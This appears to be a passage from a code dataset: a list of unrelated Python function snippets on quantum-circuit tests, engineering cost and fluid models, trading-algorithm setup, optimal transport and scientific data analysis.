nsep=1))", "def run_workflow_couplings(config: _data.DerivativeCoupling) -> PromisedObject:\n # compute the molecular orbitals\n logger.info(\"starting couplings calculation!\")\n mo_paths_hdf5, energy_paths_hdf5 = unpack(calculate_mos(config), 2)\n\n # Overlap matrix at two different times\n promised_overlaps = calculate_overlap(config, mo_paths_hdf5)\n\n # Calculate Non-Adiabatic Coupling\n promised_crossing_and_couplings = lazy_couplings(config, promised_overlaps)\n\n # Write the results in PYXAID format\n config.path_hamiltonians = create_path_hamiltonians(config.workdir, config.orbitals_type)\n\n # Inplace scheduling of write_hamiltonians function.\n # Equivalent to add @schedule on top of the function\n schedule_write_ham = schedule(write_hamiltonians)\n\n # Number of matrix computed\n config.npoints = len(config.geometries) - 2\n\n # Write Hamilotians in PYXAID format\n promise_files = schedule_write_ham(\n config, promised_crossing_and_couplings, mo_paths_hdf5)\n\n return gather(promise_files, energy_paths_hdf5)", "def _calc_Tx(self, name, x=None, lambdify=True):\n\n Tx = None\n Tx_func = None\n filename = name + '[0,0,0]' if np.allclose(x, 0) else name\n filename += '_Tx'\n # check to see if we have our transformation saved in file\n Tx, Tx_func = self._load_from_file(filename, lambdify)\n\n if Tx is None and Tx_func is None:\n print('Generating transform function for %s' % filename)\n T = self._calc_T(name=name)\n # transform x into world coordinates\n if np.allclose(x, 0):\n # if we're only interested in the origin, not including\n # the x variables significantly speeds things up\n Tx = T * sp.Matrix([0, 0, 0, 1])\n else:\n # if we're interested in other points in the given frame\n # of reference, calculate transform with x variables\n Tx = T * 
sp.Matrix(self.x + [1])\n Tx = sp.Matrix(Tx)\n\n # save to file\n abr_control.utils.os_utils.makedirs(\n '%s/%s' % (self.config_folder, filename))\n cloudpickle.dump(sp.Matrix(Tx), open(\n '%s/%s/%s' % (self.config_folder, filename, filename),\n 'wb'))\n\n if lambdify is False:\n # if should return expression not function\n return Tx\n\n if Tx_func is None:\n Tx_func = self._generate_and_save_function(\n filename=filename, expression=Tx,\n parameters=self.q+self.x)\n return Tx_func", "def test_multirz_decomposition(self, diff_method):\r\n dev = qml.device(\"default.qubit\", wires=3)\r\n\r\n def circuit(a, b):\r\n qml.RX(a, wires=0)\r\n qml.MultiRZ(b, wires=[0, 1, 2])\r\n return qml.expval(qml.PauliX(0))\r\n\r\n circuit = qml.QNode(circuit, dev, diff_method=diff_method)\r\n params = [0.1, 0.2]\r\n result = qml.metric_tensor(circuit)(*params)\r\n assert result.shape == (2, 2)", "def __call__ ( self , args , cor = None ) :\n n = self.N \n assert len ( args ) == n , 'Invalid argument size'\n\n ## get value of the function \n val = self.func ( *args )\n \n c2 = 0\n \n x = n * [ 0 ] ## argument \n g = n * [ 0 ] ## gradient \n \n for i in range ( n ) :\n\n xi = VE ( args[i] )\n x [i] = x \n \n ci = xi.cov2()\n if ci < 0 or iszero ( ci ) : continue\n \n di = self.partial[i] ( *args )\n if iszero ( di ) : continue\n \n ei = xi.error() \n\n g [i] = di \n e [i] = ei\n \n ## diagonal correlation coefficients are assumed to be 1 and ignored! \n c2 += ci * di * di\n \n for j in range ( i ) : \n\n xj = x [ j ]\n cj = xj.cov2 () \n if cj < 0 or iszero ( cj ) : continue\n dj = d [ j ]\n if iszero ( dj ) : continue \n ej = e [ j ]\n\n rij = self.__corr ( cor , i , j ) if cor else 0 \n assert -1 <= rij <= 1 or isequal ( abs ( rij ) , 1 ) ,\\\n 'Invalid correlaation coefficient (%d,%d)=%s ' % ( i , j , rij )\n \n c2 += 2.0 * di * dj * rij * ei * ej \n \n return VE ( val , c2 )", "def __call__(self, event_type, energy=1000):\r\n cdb_psf = self.cdb_psf \r\n \r\n class PSF(object):\r\n def __init__(self, event_type, energy):\r\n self.event_type =event_type\r\n self.setEnergy(energy)\r\n self.parent = cdb_psf # reference for clients that need it, like convolution\r\n \r\n def setEnergy(self, energy):\r\n self.energy=energy\r\n self.cpsf = cdb_psf.get_cpp_psf(energy,event_type) # for access to C++\r\n class TBand(object):\r\n def __init__(self, energy, event_type, **kwargs):\r\n self.e, self.ct = energy, event_type\r\n self.__dict__.update(kwargs)\r\n \r\n self.bpsf = pypsf.BandCALDBPsf(cdb_psf, TBand(self.energy, self.event_type),\r\n override_en=False,adjust_mean=False)\r\n\r\n def __repr__(self):\r\n return 'PSF for event_type %d, energy %.0f MeV' % (self.event_type, self.energy)\r\n \r\n def __call__(self, delta):\r\n return self.bpsf(delta)\r\n def integral(self, dmax, dmin=0):\r\n \"\"\" this does not seem to be the integral over solid angle\"\"\"\r\n # more expressive\r\n #return integrate.quad(lambda r: 2*np.pi*r*self(r), dmin, dmax)[0]\r\n return self.bpsf.integral(dmax, dmin)\r\n def inverse_integral(self, percent=68,on_axis=False): \r\n return self.parent.inverse_integral(self.energy, self.event_type, percent, on_axis)\r\n \r\n def overlap(self, roi_dir, radius, skydir): #not tested\r\n #return pypsf.PsfOverlap()(roi_dir, self.sd, skydir) \r\n return self.cpsf.overlap_circle(roi_dir, np.radians(radius), skydir)\r\n \r\n return PSF(event_type, energy)", "def initialize(context): \r\n context.lookback_window = 3 # look back window for technical indicator calculations.\r\n context.data_history_window = 150 
# we will accumulate data from the past 1000 days.\r\n context.price_current = [] # initialize empty current price list. This is a float.\r\n context.equities = [] # list of type string. Will contain the names of all equities traded by the algorithm\r\n context.technical_indicator_data = pd.DataFrame() # initialize an empty pandas dataframe that can hold data of three technical indicators\r\n context.leverage_buffer = 0.95 # limits leverage, or equities brought on credit. This will solve problems of overshorting our portfolio \r\n context.weight = {}\r\n context.ENSEMBLE_PREDICTION = 0.0\r\n \r\n # gather the technical indicators at 10 AM each stock-trading day \r\n schedule_function(get_initial_price, \r\n date_rules.every_day(),\r\n time_rules.market_open(minutes = 1))\r\n # conduct calculations using the NN and KNN\r\n schedule_function(predict_and_weigh,\r\n date_rules.every_day(), \r\n time_rules.market_open(minutes = 2))\r\n # trade\r\n schedule_function(trade, \r\n date_rules.every_day(),\r\n time_rules.market_open(minutes = 3))\r\n # close all the positions made in previous day\r\n schedule_function(close_position,\r\n date_rules.every_day(),\r\n time_rules.market_close(minutes = 1))\r\n # Record tracking variables at the end of each day. Variables will include the correlation of training data\r\n schedule_function(my_record_vars, \r\n date_rules.every_day(), \r\n time_rules.market_close())\r\n # Create our dynamic stock selector.\r\n attach_pipeline(make_pipeline(), 'my_pipeline')", "def _compose(self, other):\n if self.num_qubits != other.num_qubits:\n raise QiskitError(\"Multiplication on different number of qubits.\")\n result = CNOTDihedral(num_qubits=self.num_qubits)\n result.shift = [\n (x[0] + x[1]) % 2 for x in zip(self._z2matvecmul(other.linear, self.shift), other.shift)\n ]\n result.linear = self._z2matmul(other.linear, self.linear)\n # Compute x' = B1*x + c1 using the p_j identity\n new_vars = []\n for i in range(self.num_qubits):\n support = np.arange(other.num_qubits)[np.nonzero(self.linear[i])]\n poly = SpecialPolynomial(self.num_qubits)\n poly.set_pj(support)\n if self.shift[i] == 1:\n poly = -1 * poly\n poly.weight_0 = (poly.weight_0 + 1) % 8\n new_vars.append(poly)\n # p' = p1 + p2(x')\n result.poly = self.poly + other.poly.evaluate(new_vars)\n return result", "def calc_Cinv_boiler(Q_design_W, technology_type, boiler_cost_data):\n Capex_a_Boiler_USD = 0.0\n Opex_a_fix_Boiler_USD = 0.0\n Capex_Boiler_USD = 0.0\n\n if Q_design_W > 0.0:\n boiler_cost_data = boiler_cost_data[boiler_cost_data['code'] == technology_type]\n # if the Q_design is below the lowest capacity available for the technology, then it is replaced by the least\n # capacity for the corresponding technology from the database\n if Q_design_W < boiler_cost_data.iloc[0]['cap_min']:\n Q_design_W = boiler_cost_data.iloc[0]['cap_min']\n max_boiler_size = boiler_cost_data.iloc[0]['cap_max']\n\n if Q_design_W <= max_boiler_size:\n\n boiler_cost_data = boiler_cost_data[\n (boiler_cost_data['cap_min'] <= Q_design_W) & (boiler_cost_data['cap_max'] > Q_design_W)]\n\n Inv_a = boiler_cost_data.iloc[0]['a']\n Inv_b = boiler_cost_data.iloc[0]['b']\n Inv_c = boiler_cost_data.iloc[0]['c']\n Inv_d = boiler_cost_data.iloc[0]['d']\n Inv_e = boiler_cost_data.iloc[0]['e']\n Inv_IR = boiler_cost_data.iloc[0]['IR_%']\n Inv_LT = boiler_cost_data.iloc[0]['LT_yr']\n Inv_OM = boiler_cost_data.iloc[0]['O&M_%'] / 100.0\n\n InvC = Inv_a + Inv_b * (Q_design_W) ** Inv_c + (Inv_d + Inv_e * Q_design_W) * log(Q_design_W)\n\n 
Capex_a_Boiler_USD = calc_capex_annualized(InvC, Inv_IR, Inv_LT)\n Opex_a_fix_Boiler_USD = InvC * Inv_OM\n Capex_Boiler_USD = InvC\n\n else:\n number_of_boilers = int(ceil(Q_design_W / max_boiler_size))\n Q_nom_W = Q_design_W / number_of_boilers\n\n boiler_cost_data = boiler_cost_data[\n (boiler_cost_data['cap_min'] <= Q_nom_W) & (boiler_cost_data['cap_max'] > Q_nom_W)]\n\n Inv_a = boiler_cost_data.iloc[0]['a']\n Inv_b = boiler_cost_data.iloc[0]['b']\n Inv_c = boiler_cost_data.iloc[0]['c']\n Inv_d = boiler_cost_data.iloc[0]['d']\n Inv_e = boiler_cost_data.iloc[0]['e']\n Inv_IR = boiler_cost_data.iloc[0]['IR_%']\n Inv_LT = boiler_cost_data.iloc[0]['LT_yr']\n Inv_OM = boiler_cost_data.iloc[0]['O&M_%'] / 100.0\n\n InvC = (Inv_a + Inv_b * (Q_nom_W) ** Inv_c + (Inv_d + Inv_e * Q_nom_W) * log(Q_nom_W)) * number_of_boilers\n\n Capex_a_Boiler_USD = calc_capex_annualized(InvC, Inv_IR, Inv_LT)\n Opex_a_fix_Boiler_USD = InvC * Inv_OM\n Capex_Boiler_USD = InvC\n\n return Capex_a_Boiler_USD, Opex_a_fix_Boiler_USD, Capex_Boiler_USD", "def derivatives(self, increment_filter):\n ######################################################################\n # derivatives fluid and mass balance are static\n k = self.num_nw_fluids + 1\n\n ######################################################################\n # derivatives for specified heat transfer\n if self.Q.is_set:\n self.jacobian[k, 0, 0] = (\n self.outl[0].h.val_SI - self.inl[0].h.val_SI)\n self.jacobian[k, 0, 2] = -self.inl[0].m.val_SI\n self.jacobian[k, 1, 2] = self.inl[0].m.val_SI\n # custom variable Q\n if self.Q.is_var:\n self.jacobian[k, 2 + self.Q.var_pos, 0] = -1\n k += 1\n\n ######################################################################\n # derivatives for specified pressure ratio\n if self.pr.is_set:\n self.jacobian[k, 0, 1] = self.pr.val\n self.jacobian[k, 1, 1] = -1\n # custom variable pr\n if self.pr.is_var:\n self.jacobian[k, 2 + self.pr.var_pos, 0] = (\n self.inl[0].p.val_SI)\n k += 1\n\n ######################################################################\n # derivatives for specified zeta\n if self.zeta.is_set:\n f = self.zeta_func\n if not increment_filter[0, 0]:\n self.jacobian[k, 0, 0] = self.numeric_deriv(\n f, 'm', 0, zeta='zeta')\n if not increment_filter[0, 2]:\n self.jacobian[k, 0, 1] = self.numeric_deriv(\n f, 'p', 0, zeta='zeta')\n if not increment_filter[0, 2]:\n self.jacobian[k, 0, 2] = self.numeric_deriv(\n f, 'h', 0, zeta='zeta')\n if not increment_filter[1, 1]:\n self.jacobian[k, 1, 1] = self.numeric_deriv(\n f, 'p', 1, zeta='zeta')\n if not increment_filter[1, 2]:\n self.jacobian[k, 1, 2] = self.numeric_deriv(\n f, 'h', 1, zeta='zeta')\n # custom variable zeta\n if self.zeta.is_var:\n self.jacobian[k, 2 + self.zeta.var_pos, 0] = (\n self.numeric_deriv(f, 'zeta', 2, zeta='zeta'))\n k += 1\n\n ######################################################################\n # derivatives for specified hydro-group parameters\n if self.hydro_group.is_set:\n # hazen williams equation\n if self.hydro_group.method == 'HW':\n func = self.hw_func\n # darcy friction factor\n else:\n func = self.darcy_func\n\n if not increment_filter[0, 0]:\n self.jacobian[k, 0, 0] = self.numeric_deriv(func, 'm', 0)\n if not increment_filter[0, 1]:\n self.jacobian[k, 0, 1] = self.numeric_deriv(func, 'p', 0)\n if not increment_filter[0, 2]:\n self.jacobian[k, 0, 2] = self.numeric_deriv(func, 'h', 0)\n if not increment_filter[1, 1]:\n self.jacobian[k, 1, 1] = self.numeric_deriv(func, 'p', 1)\n if not increment_filter[1, 2]:\n self.jacobian[k, 1, 2] = 
self.numeric_deriv(func, 'h', 1)\n # custom variables of hydro group\n for var in self.hydro_group.elements:\n if var.is_var:\n self.jacobian[k, 2 + var.var_pos, 0] = (\n self.numeric_deriv(func, self.vars[var], 2))\n k += 1\n\n ######################################################################\n # derivatives for additional equations\n self.additional_derivatives(increment_filter, k)", "def corr():\n\n @sinks\n def _dagpype_internal_fn_act(target):\n c = dagpype_c.Correlator()\n try:\n while True:\n x, y = (yield)\n c.push(float(x), float(y))\n except GeneratorExit:\n target.send(c.corr())\n target.close()\n return _dagpype_internal_fn_act", "def test_jax(self, diff_method, tol):\r\n if diff_method == \"parameter-shift\":\r\n pytest.skip(\"Does not support parameter-shift\")\r\n\r\n jax = pytest.importorskip(\"jax\")\r\n from jax import numpy as jnp\r\n\r\n dev = qml.device(\"default.qubit.jax\", wires=2)\r\n\r\n @qml.qnode(dev, interface=\"jax\", diff_method=\"backprop\")\r\n def circuit(weights):\r\n qml.RX(weights[0], wires=0)\r\n qml.RY(weights[1], wires=0)\r\n qml.CNOT(wires=[0, 1])\r\n qml.PhaseShift(weights[2], wires=1)\r\n return qml.expval(qml.PauliX(0)), qml.expval(qml.PauliX(1))\r\n\r\n circuit.interface = \"jax\"\r\n\r\n def cost(weights):\r\n return qml.metric_tensor(circuit)(weights)[2, 2]\r\n\r\n weights = jnp.array([0.432, 0.12, -0.432])\r\n a, b, c = weights\r\n\r\n grad = jax.grad(cost)(weights)\r\n expected = np.array(\r\n [np.cos(a) * np.cos(b) ** 2 * np.sin(a) / 2, np.cos(a) ** 2 * np.sin(2 * b) / 4, 0]\r\n )\r\n assert np.allclose(grad, expected, atol=tol, rtol=0)", "def __init__(self, *args):\n _ITKCostFunctionsPython.itkMultipleValuedVnlCostFunctionAdaptor_swiginit(self,_ITKCostFunctionsPython.new_itkMultipleValuedVnlCostFunctionAdaptor(*args))", "def __init__(self,\n X_seed,\n y_seed,\n X_full,\n target_function,\n acquisition_function='cb',\n exploration_steps=10,\n batch_size=100,\n batch_update=False,\n kernel='RBF',\n lengthscale=None,\n sparse=False,\n indpoints=None,\n gp_iterations=1000,\n seed=0,\n **kwargs):\n self.verbose = kwargs.get(\"verbose\", 1)\n self.use_gpu = kwargs.get(\"use_gpu\", False)\n learning_rate = kwargs.get(\"learning_rate\", 5e-2)\n jitter = kwargs.get(\"jitter\", 1.0e-6)\n isotropic = kwargs.get(\"isotropic\", False)\n self.precision = kwargs.get(\"precision\", \"double\")\n\n if self.use_gpu and torch.cuda.is_available():\n if self.precision == \"single\":\n torch.set_default_tensor_type(torch.cuda.FloatTensor)\n else:\n torch.set_default_tensor_type(torch.cuda.DoubleTensor)\n else:\n if self.precision == \"single\":\n torch.set_default_tensor_type(torch.FloatTensor)\n else:\n torch.set_default_tensor_type(torch.DoubleTensor)\n\n self.surrogate_model = gpr.reconstructor(\n X_seed, y_seed, X_full, kernel, lengthscale, sparse, indpoints,\n learning_rate, gp_iterations, self.use_gpu, self.verbose, seed,\n isotropic=isotropic, precision=self.precision, jitter=jitter)\n\n self.X_sparse = X_seed.copy()\n self.y_sparse = y_seed.copy()\n self.X_full = X_full\n\n self.target_function = target_function\n self.acquisition_function = acquisition_function\n self.exploration_steps = exploration_steps\n self.batch_update = batch_update\n self.batch_size = batch_size\n self.simulate_measurement = kwargs.get(\"simulate_measurement\", False)\n if self.simulate_measurement:\n self.y_true = kwargs.get(\"y_true\")\n if self.y_true is None:\n raise AssertionError(\n \"To simulate measurements, add ground truth ('y_true)\")\n self.extent = 
kwargs.get(\"extent\", None)\n self.alpha, self.beta = kwargs.get(\"alpha\", 0), kwargs.get(\"beta\", 1)\n self.xi = kwargs.get(\"xi\", 0.01)\n self.dscale = kwargs.get(\"dscale\", None)\n self.batch_dscale = kwargs.get(\"batch_dscale\", None)\n self.batch_out_max = kwargs.get(\"batch_out_max\", 10)\n self.gamma = kwargs.get(\"gamma\", 0.8)\n self.points_mem = kwargs.get(\"memory\", 10)\n self.exit_strategy = kwargs.get(\"exit_strategy\", 1)\n self.mask = kwargs.get(\"mask\", None)\n self.save_checkpoints = kwargs.get(\"save_checkpoints\", False)\n self.filename = kwargs.get(\"filename\", \"./boptim_results\")\n self.indices_all, self.vals_all = [], []\n self.target_func_vals, self.gp_predictions = [y_seed.copy()], []", "def _fcts():\n import numpy # pylint: disable=C0415\n from .cbenchmark_dot import vector_dot_product # pylint: disable=E0611,C0415\n from .cbenchmark_dot import vector_dot_product16 # pylint: disable=E0611,C0415\n from .cbenchmark_dot import vector_dot_product16_nofcall # pylint: disable=E0611,C0415\n from .cbenchmark_dot import vector_dot_product16_sse # pylint: disable=E0611,C0415\n\n def simple_dot(values):\n return numpy.dot(values, values)\n\n def c11_dot(vect):\n return vector_dot_product(vect, vect)\n\n def c11_dot16(vect):\n return vector_dot_product16(vect, vect)\n\n def c11_dot16_nofcall(vect):\n return vector_dot_product16_nofcall(vect, vect)\n\n def c11_dot16_sse(vect):\n return vector_dot_product16_sse(vect, vect)\n\n return [simple_dot, c11_dot, c11_dot16, c11_dot16_nofcall, c11_dot16_sse]", "def _new_comp(self, basis):\n from .comp import KroneckerDelta\n if self._is_identity:\n fmodule = self._fmodule\n return KroneckerDelta(fmodule._ring, basis,\n start_index=fmodule._sindex,\n output_formatter=fmodule._output_formatter)\n return FreeModuleTensor._new_comp(self, basis)", "def __init__(self):\n super(ASYMMETRIC, self).__init__(quant_type=Constants.QZ_ASYMMETRIC)", "def getQValue(self, state, action):\n \"\"\"Description:\n [Enter a description of what you did here.]\n Use first equation in slide 71 of MDP to compute q-value depond on weights and current features.\n \n !! But I think what I did is not work for IdentityExtractor. 
Because feature of IdentityExtrator always return 1,\n it did not change even a ghost is closing.\n \"\"\"\n \"\"\" YOUR CODE HERE \"\"\"\n # if weight is empty, then weight will need to initial to 1 for all features\n # According to which Extractor user choose, weight counter will have equal number of keys.\n if len(self.weight) == 0:\n feat = self.featExtractor.getFeatures(state, action)\n self.weight.incrementAll(feat.keys(), 1)\n \n qValue = self.weight * self.featExtractor.getFeatures(state,action)\n return qValue\n \"\"\" END CODE \"\"\"", "def calculate_correlation(data):\n pass", "def test_trig2_vector():\n p=[1,1,1]\n c=[0.5,0.5,3]\n def myfunc(x,y,z):\n a = (EF.sin(x))\n b = (EF.arccos(y))\n c = (EF.tan(z))\n return a + b + c\n\n f_obj=ADiff(myfunc)\n res=f_obj.pJac(c,p)\n calc_diff = round(res['diff'],10)\n assert {'diff':round(0.7432015404535481,10), 'value': math.sin(c[0])+ math.acos(c[1]) + math.tan(c[2])} == {'diff':round(res['diff'],10),'value':res['value']}#diff values differ at last digits when calculate with math.cos(c[0])- 1/(math.sqrt(1-c[1]**2))+ 1/(math.cos(c[2])*math.cos(c[2]))", "def test_QFTn(n):\n q = QuantumRegister(n, 'q') # +lost+lost2\n circ = QuantumCircuit(q)\n circ.x(q[0])\n RegX = [q[i] for i in range(n)]\n QFTn(circ, q, RegX)\n print(RegX)\n iQFTn(circ, q, RegX)\n launch2(circ)\n circ_m = measure_direct(circ, q, RegX)\n return circ_m", "def __init__(self,\n func=None,\n refresh_period=0,\n window_length=None,\n clean_nans=True,\n sids=None,\n fields=None,\n compute_only_full=True,\n bars='daily',\n downsample=False):\n if func is not None:\n self.compute_transform_value = func\n else:\n self.compute_transform_value = self.get_value\n\n self.clean_nans = clean_nans\n self.compute_only_full = compute_only_full\n # no need to down sample if the bars are already daily\n self.downsample = downsample and (bars == 'minute')\n\n # How many bars are in a day\n self.bars = bars\n if self.bars == 'daily':\n self.bars_in_day = 1\n elif self.bars == 'minute':\n self.bars_in_day = int(6.5 * 60)\n else:\n raise ValueError('%s bars not understood.' % self.bars)\n\n # The following logic is to allow pre-specified sid filters\n # to operate on the data, but to also allow new symbols to\n # enter the batch transform's window IFF a sid filter is not\n # specified.\n if sids is not None:\n if isinstance(sids, (string_types, Integral)):\n self.static_sids = set([sids])\n else:\n self.static_sids = set(sids)\n else:\n self.static_sids = None\n\n self.initial_field_names = fields\n if isinstance(self.initial_field_names, string_types):\n self.initial_field_names = [self.initial_field_names]\n self.field_names = set()\n\n self.refresh_period = refresh_period\n\n check_window_length(window_length)\n self.window_length = window_length\n\n self.trading_days_total = 0\n self.window = None\n\n self.full = False\n # Set to -inf essentially to cause update on first attempt.\n self.last_dt = pd.Timestamp('1900-1-1', tz='UTC')\n\n self.updated = False\n self.cached = None\n self.last_args = None\n self.last_kwargs = None\n\n # Data panel that provides bar information to fill in the window,\n # when no bar ticks are available from the data source generator\n # Used in universes that 'rollover', e.g. 
one that has a different\n # set of stocks per quarter\n self.supplemental_data = None\n\n self.rolling_panel = None\n self.daily_rolling_panel = None", "def query(self):\n self._measurements[self.KEY_FMIX].df = self.fetch_data_fmix()\n self._measurements[self.KEY_EMIS].df = self.co2_calc(self._measurements[self.KEY_FMIX].df)", "def test_qft_reconstruction(self, interface):\n circuit = qft_circuit(3, interface=interface)\n bits, recipes = circuit()\n shadow = ClassicalShadow(bits, recipes)\n\n state = shadow.global_snapshots()\n assert state.shape == (10000, 8, 8)\n\n state = np.mean(state, axis=0)\n expected = np.exp(np.arange(8) * 2j * np.pi / 8) / np.sqrt(8)\n expected = np.outer(expected, np.conj(expected))\n\n assert qml.math.allclose(state, expected, atol=1e-1)", "def fx(self) -> float:\n\n return self.intrinsic_matrix[0, 0]", "def temperature_diff_wrapped(q: float,\n delta_tc: np.ndarray,\n T_r:np.ndarray,\n order = 1) -> callable:\n \n def objective_function(T_cr: np.ndarray) -> np.ndarray:\n\n \"\"\"\n the function to minimize in order to get the non-linear\n relationship for the geometrically extrapolated cooled surface temperatures\n \"\"\"\n \n Tm = (T_r + T_cr)/2.0\n ks = thermal_conductivity(Tm)\n T_cr_update = cooled_surface_temp_actual(T_r,q,delta_tc,ks)\n \n return np.linalg.norm(T_cr_update - T_cr,ord = 1)\n \n return objective_function", "def _call(self, x):\n u = functional.tmp_u_prox\n v = functional.tmp_v_prox\n\n # Running generalized Sinkhorn iterations\n for j in range(functional.niter):\n # Safe-guarded u-update, to avoid divide-by-zero error.\n u_old = u.copy()\n tmp1 = functional.K_op(v)\n if np.min(tmp1) < 1e-30 or np.max(tmp1) > 1e+50:\n print('Numerical instability, truncation in Transport prox (Kv)',\n str(np.min(tmp1)), str(np.max(tmp1)))\n\n tmp = np.fmax(tmp1, 1e-30)\n\n\n u = functional.mu0 / tmp\n if np.min(u) < 1e-30 or np.max(u) > 1e+50:\n print('u (min/max)', str(np.min(u)), str(np.max(u)))\n\n # Safe-guarded v-update, to avoid divide-by-zero error.\n v_old = v.copy()\n\n tmp3 = functional.K_op_adjoint(u)\n if np.min(tmp3) < 1e-30 or np.max(tmp3) > 1e+50:\n print('Truncation in Transport prox (KTu)',\n str(np.min(tmp3)), str(np.max(tmp3)))\n print('u (min/max)', str(np.min(u)), str(np.max(u)))\n\n tmp4 = (self.const * tmp3 * np.exp(self.const * x))\n\n if np.min(tmp4) < 1e-30 or np.max(tmp4) > 1e+200:\n print('Argument in lambdert omega (min/max)',\n str(np.min(tmp4)), str(np.max(tmp4)))\n\n v = np.exp(self.const * x - lambertw_fulfix(tmp4))\n\n v1 = np.exp(self.const * x - scipy.special.lambertw(\n tmp4))\n if (v-v1).norm() > 1e-10:\n print('diff pga ny lambderw omega funciton',\n str((v-v1).norm()))\n print('v (min/max)', str(np.min(v)), str(np.max(v)))\n print('Argument in lambdert omega (min/max)',\n str(np.min(tmp4)), str(np.max(tmp4)))\n\n # If the updates in both u and v are small, break the loop\n if ((np.log(v)-np.log(v_old)).norm() < 1e-8 and\n (np.log(u)-np.log(u_old)).norm() < 1e-8):\n break\n\n # Store the u and v in the internal temporary variables of the\n # functional\n functional.tmp_u_prox = u\n functional.tmp_v_prox = v\n\n return x - self.sigma * functional.epsilon * np.log(v)", "def test_jax(self, tol):\n\n import jax\n import jax.numpy as jnp\n\n shapes = expected_shapes(1, 2)\n weights = [np.random.random(shape) for shape in shapes]\n weights = [jnp.array(w) for w in weights]\n\n dev = DummyDevice(wires=2)\n\n circuit = qml.QNode(circuit_template, dev)\n circuit2 = qml.QNode(circuit_decomposed, dev)\n\n res = 
circuit(*weights)\n res2 = circuit2(*weights)\n assert qml.math.allclose(res, res2, atol=tol, rtol=0)\n\n grad_fn = jax.grad(circuit)\n grads = grad_fn(*weights)\n\n grad_fn2 = jax.grad(circuit2)\n grads2 = grad_fn2(*weights)\n\n assert np.allclose(grads[0], grads2[0], atol=tol, rtol=0)", "def qfunc(x):\n # Error check inputs\n if isinstance(x, np.ndarray):\n if x.dtype == np.complex128:\n raise TypeError(\"complex input not supported\")\n else:\n if isinstance(x, complex):\n raise TypeError(\"complex input not supported\")\n\n Q = 0.5 * erfc(x / np.sqrt(2.0))\n return Q", "def test_differentiable_expand(self, execute_kwargs, tol):\n\n class U3(qml.U3):\n def expand(self):\n theta, phi, lam = self.data\n wires = self.wires\n return [\n qml.Rot(lam, theta, -lam, wires=wires),\n qml.PhaseShift(phi + lam, wires=wires),\n ]\n\n def cost_fn(a, p, device):\n qscript = qml.tape.QuantumScript(\n [qml.RX(a, wires=0), U3(*p, wires=0)], [qml.expval(qml.PauliX(0))]\n )\n qscript = qscript.expand(stop_at=lambda obj: device.supports_operation(obj.name))\n return execute([qscript], device, **execute_kwargs)[0]\n\n a = jax.numpy.array(0.1)\n p = jax.numpy.array([0.1, 0.2, 0.3])\n\n dev = qml.device(\"default.qubit\", wires=1)\n res = jax.jit(cost_fn, static_argnums=2)(a, p, device=dev)\n expected = np.cos(a) * np.cos(p[1]) * np.sin(p[0]) + np.sin(a) * (\n np.cos(p[2]) * np.sin(p[1]) + np.cos(p[0]) * np.cos(p[1]) * np.sin(p[2])\n )\n assert np.allclose(res, expected, atol=tol, rtol=0)\n\n jac_fn = jax.jit(jax.grad(cost_fn, argnums=(1)), static_argnums=2)\n res = jac_fn(a, p, device=dev)\n expected = jax.numpy.array(\n [\n np.cos(p[1]) * (np.cos(a) * np.cos(p[0]) - np.sin(a) * np.sin(p[0]) * np.sin(p[2])),\n np.cos(p[1]) * np.cos(p[2]) * np.sin(a)\n - np.sin(p[1])\n * (np.cos(a) * np.sin(p[0]) + np.cos(p[0]) * np.sin(a) * np.sin(p[2])),\n np.sin(a)\n * (np.cos(p[0]) * np.cos(p[1]) * np.cos(p[2]) - np.sin(p[1]) * np.sin(p[2])),\n ]\n )\n assert np.allclose(res, expected, atol=tol, rtol=0)", "def test_statistics_calculator_transfer_function():\n from resistics.statistics.calculator import StatisticCalculator\n import numpy as np\n\n specData, evalfreq = get_spectrum_data()\n calculator = StatisticCalculator()\n calculator.winLen = 1\n assert calculator.winLen == 1\n calculator.setSpectra(specData.freqArray, specData, evalfreq)\n statData = calculator.getDataForStatName(\"transferFunction\")\n testData = {\n 24: {\n \"ExHxRes\": 0.0051423310440927615,\n \"ExHxPhase\": -38.08089717250079,\n \"ExHxReal\": 0.6183338309943266,\n \"ExHxImag\": -0.484502836667662,\n \"ExHyRes\": 0.002406937394247041,\n \"ExHyPhase\": -79.49669804710025,\n \"ExHyReal\": 0.09796954314720807,\n \"ExHyImag\": -0.5284263959390865,\n \"EyHxRes\": 0.003364188314919875,\n \"EyHxPhase\": 40.70059399014801,\n \"EyHxReal\": 0.48169602866527317,\n \"EyHxImag\": 0.4143326366079426,\n \"EyHyRes\": 0.001522842639593909,\n \"EyHyPhase\": 49.044485574181074,\n \"EyHyReal\": 0.2802030456852794,\n \"EyHyImag\": 0.3228426395939085,\n },\n 40: {\n \"ExHxRes\": 0.0021009588268471532,\n \"ExHxPhase\": -12.512585801455565,\n \"ExHxReal\": 0.6328257191201355,\n \"ExHxImag\": -0.14043993231810512,\n \"ExHyRes\": 0.0017318809926677931,\n \"ExHyPhase\": -91.1943471837543,\n \"ExHyReal\": -0.012267343485617588,\n \"ExHyImag\": -0.5884094754653127,\n \"EyHxRes\": 0.002820078962210943,\n \"EyHxPhase\": 120.6095367512591,\n \"EyHxReal\": -0.3824027072758038,\n \"EyHxImag\": 0.6463620981387479,\n \"EyHyRes\": 0.0006838691483361542,\n \"EyHyPhase\": 
1.4419233716812918,\n \"EyHyReal\": 0.36971235194585467,\n \"EyHyImag\": 0.009306260575296085,\n },\n }\n for efreq in evalfreq:\n for key, val in statData[efreq].items():\n np.testing.assert_almost_equal(val, testData[efreq][key])", "def _GetCorrelationFunction(Ri='S',Rj='D',AAP=[_Hydrophobicity,_hydrophilicity,_residuemass]):\n\tHydrophobicity=NormalizeEachAAP(AAP[0])\n\thydrophilicity=NormalizeEachAAP(AAP[1])\n\tresiduemass=NormalizeEachAAP(AAP[2])\n\ttheta1=math.pow(Hydrophobicity[Ri]-Hydrophobicity[Rj],2)\n\ttheta2=math.pow(hydrophilicity[Ri]-hydrophilicity[Rj],2)\n\ttheta3=math.pow(residuemass[Ri]-residuemass[Rj],2)\n\ttheta=round((theta1+theta2+theta3)/3.0,3)\n\treturn theta", "def __init__(\n self, problem_results: ProblemResults, demand_instruments: Array, supply_instruments: Array,\n inverse_covariance_matrix: Array, expected_xi_jacobian: Array, expected_omega_jacobian: Array,\n expected_prices: Array, expected_shares: Array, start_time: float, end_time: float, draws: int,\n iteration_stats: Sequence[Mapping[Hashable, SolverStats]]) -> None:\n self.problem_results = problem_results\n self.demand_instruments = demand_instruments\n self.supply_instruments = supply_instruments\n self.inverse_covariance_matrix = inverse_covariance_matrix\n self.expected_xi_by_theta_jacobian = expected_xi_jacobian\n 